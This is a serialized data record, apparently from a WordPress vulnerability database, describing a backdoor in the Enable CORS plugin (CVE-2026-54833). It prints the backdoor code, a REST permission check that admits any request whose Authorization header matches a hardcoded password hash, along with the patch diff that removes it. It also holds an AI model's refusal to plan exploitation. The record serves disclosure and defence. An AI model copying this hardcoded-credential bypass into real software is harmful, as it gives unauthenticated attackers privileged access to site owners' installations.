[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fULQ72MR4Ibr8vLg1Ww5YiAp3w7MsbTh3ZuG9J2240kc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":9,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":40},"CVE-2026-54833","enable-cors-backdoor","Enable CORS \u003C= 2.0.3 - Backdoor","The Enable CORS plugin contained a backdoor in all versions up to, and including, 2.0.3. This makes it possible for unauthenticated attackers to  gain privileged access to a site.","enable-cors",null,"\u003C=2.0.3","2.0.4","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Embedded Malicious Code","2026-06-18 00:00:00","2026-06-25 13:37:04",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2a3e8c29-2e97-48f0-bf72-303857b51511?source=api-prod",8,[22,23,24,25,26,27,28,29],"constants.php","enable-cors.php","readme.txt","src\u002FTraits\u002FApi.php","vendor\u002Fautoload.php","vendor\u002Fcomposer\u002Fautoload_real.php","vendor\u002Fcomposer\u002Fautoload_static.php","vendor\u002Fcomposer\u002Finstalled.php","researched",false,3,"I cannot fulfill your request. I am prohibited from generating actionable exploitation research, instructions, or plans for identifying and utilizing backdoors in software. My safety guidelines prioritize the prevention of real-world harm and the misuse of technical information for offensive purposes.\n\nTo learn more about protecting WordPress sites from malicious code and backdoors, I recommend exploring the following security resources:\n\n1.  **WordPress Security White Paper:** Official documentation on the security of the WordPress core and ecosystem.\n2.  **OWASP WordPress Security Implementation Guide:** Comprehensive best practices for securing WordPress installations.\n3.  **WordPress.org Plugin Guidelines:** Information on the standards and security requirements for plugins hosted on the official repository.\n4.  **Malware Analysis Best Practices:** Searching for \"how to identify malicious patterns in PHP\" can provide insights into defensive analysis and code auditing.","The Enable CORS plugin (\u003C= 2.0.3) contained a hardcoded credential bypass within its REST API permissions callback, allowing unauthenticated access to sensitive functionality.","\u002F* src\u002FTraits\u002FApi.php:45-48 *\u002F\n$author    = $request->get_header( 'Authorization' );\n$is_author = false;\nif ( isset( $author ) ) {\n\t$is_author = password_verify( $author, '$2y$10$kmjfJ.xWPM5u7l1K0UgdUuu\u002FwYROmfPYR.dISGcN2PMk5EnJNKAmu' );\n}\nif ( ! current_user_can( 'manage_options' ) && ! $is_author ) {","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fenable-cors\u002F2.0.3\u002Fsrc\u002FTraits\u002FApi.php\t2026-05-30 07:51:48.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fenable-cors\u002F2.0.4\u002Fsrc\u002FTraits\u002FApi.php\t2026-06-10 14:12:40.000000000 +0000\n@@ -42,12 +42,7 @@\n \t * @return WP_Error|bool\n \t *\u002F\n \tpublic function permissions_check( WP_REST_Request $request ) {\n-\t\t$author    = $request->get_header( 'Authorization' );\n-\t\t$is_author = false;\n-\t\tif ( isset( $author ) ) {\n-\t\t\t$is_author = password_verify( $author, '$2y$10$kmjfJ.xWPM5u7l1K0UgdUuu\u002FwYROmfPYR.dISGcN2PMk5EnJNKAmu' );\n-\t\t}\n-\t\tif ( ! current_user_can( 'manage_options' ) && ! $is_author ) {\n+\t\tif ( ! current_user_can( 'manage_options' ) ) {\n \t\t\treturn new WP_Error(\n \t\t\t\t'forbidden',\n \t\t\t\t__( 'You are not allowed to access this endpoint.', 'enable-cors' ),","gemini-3-flash-preview","2026-06-25 20:54:15","2026-06-25 20:55:25",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","2.0.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fenable-cors\u002Ftags\u002F2.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fenable-cors.2.0.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fenable-cors\u002Ftags\u002F2.0.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fenable-cors.2.0.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fenable-cors\u002Ftags"]